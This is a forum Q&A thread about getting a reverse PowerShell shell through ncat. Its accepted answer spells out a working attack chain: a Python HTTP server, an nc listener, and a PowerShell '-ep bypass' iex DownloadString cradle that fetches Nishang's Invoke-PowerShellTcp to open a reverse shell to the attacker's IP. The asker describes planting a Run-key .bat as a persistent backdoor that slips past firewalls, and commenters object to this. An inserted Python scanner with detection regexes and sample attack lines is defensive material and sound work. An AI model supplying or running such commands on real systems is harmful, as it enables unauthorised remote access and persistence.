How to execute a reverse "Powershell shell" using ncat or netcat?
The reason that the PowerShell hangs on the reverse shell of your attacking machine might be due to it not being fully interactive. Try to use PowerShell-based shells like Nishang's Invoke-PowerShellTcp. Download the .ps1 script on your attacking machine, run an HTTP server for the remote host to download the script from, then download it on the remote machine.
Setting up an HTTP server on your attacking machine using either Python 2 or Python 3:
python -m SimpleHTTPServer [port1]
python3 -m http.server [port1]
Also on your attacking machine, run a netcat listener:
nc -lnvp [port2]
Then run this on the Command Prompt (cmd) of the remote machine:
powershell.exe -nop -ep bypass -c "iex ((New-Object Net.WebClient).DownloadString('http://[your attacking machine's IP address]:[port1]/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress [your attacking machine's IP address] -Port [port2]"
The caught reverse shell on your netcat should now be fully interactive.
samsam
Updated on September 18, 2022
Comments
-
samsam over 1 year
I am using ncat to execute a reverse "cmd" shell from one machine to another and without any issues using the commands:
In my machine: ncat -l 443
In the remote machine: ncat <my ip> 443 -e cmd
And all works flawlessly, however, I would very much prefer "powershell" to be executed instead of "cmd", for that I did this:
In my machine: ncat -l 443
In the remote machine: ncat <my ip> 443 -e powershell
But now a strange thing happens: the PowerShell prompt is given to the remote machine and not mine... This is the output:
In my machine: Windows PowerShell Copyright 2009 Microsoft Corporation. All rights reserved. (and it hangs there)
In the remote machine: PS C:\Users\User> (the shell is actually given to the remote machine)
Is there a way to redirect that prompt to my machine again, and have the "powershell" shell in my machine as I did with the "cmd" shell? I searched for stdout redirection but could not make it work :(
Any help would be very much appreciated.
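A detection-side example, added here and not part of the question or of any answer in this thread: a small Python scanner that flags, in constructed process-creation and Run-key records, the command patterns the thread quotes (ncat with -e cmd/powershell, the -ep bypass / iex DownloadString cradle, an Invoke-PowerShellTcp -Reverse invocation, and a Run key that launches a script). The rule names, regexes and sample records are this example's own assumptions, not output of any real tool.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (Sysmon event 1 / Security 4688 style),
# flattened to (parent_image, image, command_line). Not real telemetry; 203.0.113.5 is a
# documentation-range address standing in for the listener host.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe", 'powershell.exe -NoProfile -Command "Get-Process"'),
    ("cmd.exe", "powershell.exe",
     'powershell.exe -nop -ep bypass -c "iex ((New-Object Net.WebClient)'
     ".DownloadString('http://203.0.113.5:8000/Invoke-PowerShellTcp.ps1'));"
     'Invoke-PowerShellTcp -Reverse -IPAddress 203.0.113.5 -Port 443"'),
    ("cmd.exe", "ncat.exe", "ncat 203.0.113.5 443 -e cmd"),
    ("cmd.exe", "ncat.exe", "ncat 203.0.113.5 443 -e powershell"),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ("cmd.exe", "nc.exe", "nc -lnvp 4444"),
]

# Constructed Run-key values (Sysmon event 13 style): (value path, value data).
SAMPLE_AUTORUNS = [
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     r"C:\Program Files\OneDrive\OneDrive.exe /background"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     r"C:\Users\Public\update.bat"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backup",
     r"C:\Tools\ncat.exe 203.0.113.5 443 -e powershell"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Foo",
     r"uninstall.bat"),
]

# Detection rules over command lines; names and patterns are this example's own.
RULES = [
    # -ep bypass / -ExecutionPolicy Bypass on the PowerShell command line
    ("powershell_exec_policy_bypass",
     re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    # iex / Invoke-Expression fed by a web download (download-and-execute cradle)
    ("powershell_download_cradle",
     re.compile(r"\b(?:iex|invoke-expression)\b.*?"
                r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b)", re.I)),
    # nc / ncat / netcat <host> <port> -e cmd|powershell (program-exec shell)
    ("netcat_exec_shell",
     re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-e\s+(?:cmd|powershell)", re.I)),
    # Nishang Invoke-PowerShellTcp in reverse mode
    ("nishang_reverse_tcp",
     re.compile(r"invoke-powershelltcp\b.*-reverse", re.I)),
]
NETCAT_RULE = dict(RULES)["netcat_exec_shell"]
SCRIPT_TARGET = re.compile(r"\.(?:bat|cmd|ps1|vbs|js)\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)


@dataclass
class Finding:
    rule: str
    subject: str
    detail: str


def classify_command_line(command_line):
    """Names of every rule the command line matches; an empty list means no rule fired."""
    return [name for name, pattern in RULES if pattern.search(command_line)]


def scan_process_events(events):
    """events: iterable of (parent_image, image, command_line). One Finding per rule hit."""
    findings = []
    for parent, image, cmdline in events:
        for rule in classify_command_line(cmdline):
            findings.append(Finding(rule, image, f"parent={parent} cmd={cmdline}"))
    return findings


def scan_autoruns(entries):
    """entries: iterable of (registry_value_path, value_data).
    Only Run/RunOnce values are examined; a value that embeds a netcat exec-shell
    command is reported first, otherwise one that launches a script file."""
    findings = []
    for path, data in entries:
        if not RUN_KEY.search(path):
            continue
        if NETCAT_RULE.search(data):
            findings.append(Finding("autorun_netcat_exec_shell", path, data))
        elif SCRIPT_TARGET.search(data):
            findings.append(Finding("autorun_launches_script", path, data))
    return findings


if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_EVENTS) + scan_autoruns(SAMPLE_AUTORUNS):
        print(f"[{f.rule}] {f.subject}: {f.detail}")
```

The plain listener (nc -lnvp) and the ordinary PowerShell invocation produce no finding, while the single Nishang command line trips three rules at once; in practice the rules would run over the CommandLine field of your process-creation telemetry and the value data of Run/RunOnce keys rather than these constructed tuples.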
-
samsam about 10 years: I would like to have a persistent connection to a remote server in case of an emergency. For that I will place a .bat file in HKLM with the content: ncat <my ip> 443 -e powershell. And then set a password to that connection so not just anyone can use it, but for now I would be very happy if I could just have the reverse PowerShell shell working =P
-
mfinni about 10 years: You're still not answering my question - what problem are you trying to solve? "in an emergency" doesn't tell me anything, because the circumstances in which this would work but PS Remoting wouldn't, are eluding me.
-
samsam about 10 years: Please correct me if I am wrong, but if I use PS Remoting I will have to create a direct connection to the remote machine, and most firewalls could deny access. That is why I would prefer to have a reverse PowerShell connection using ncat.
-
mfinni about 10 years: This isn't very professional. You're allowing plaintext over the internet, using port 443 so it superficially looks like HTTPS, to traverse firewalls without the permission of the firewall owner? Because if you had permission, you could get remote access properly. If you were doing this to admin my servers, you wouldn't be working for me anymore. If I'm misunderstanding you, please do let me know.
-
samsam about 10 years: :( Take it easy man, I am also asking this just for the curiosity and the knowledge. The reason why cmd works but powershell doesn't is intriguing me. I am sure it has to do with some stdout/input redirection, but the way to make it work is for now sadly beyond my knowledge.
-
mfinni about 10 years: You've read the Help link, right? This site is intended for professional systems administrators doing work on production systems. You're trying to solve a problem that would make most sysadmins say "Please slow down and start from the top." I agree that the question you're asking is good for curiosity, and I'd even like to know the answer, but it's an inappropriate method of remote access for production systems.
-
Michael Hampton about 10 years: If you have the authorization to make a persistent connection to the server, then you should be able to use PS remoting anyway.
-
Krypton about 6 years: Any news on this? I tried with nc, the session was opened. But the shell just hung there without returning any output after I entered a command.
-
Massimo about 8 years: Please don't post link-only answers.
-
Castaglia about 8 years: Yes, link-only answers are low quality, since links can change/go stale/dead, and thus future readers would not be able to learn from your solution. Please edit your post to include the relevant details/code directly.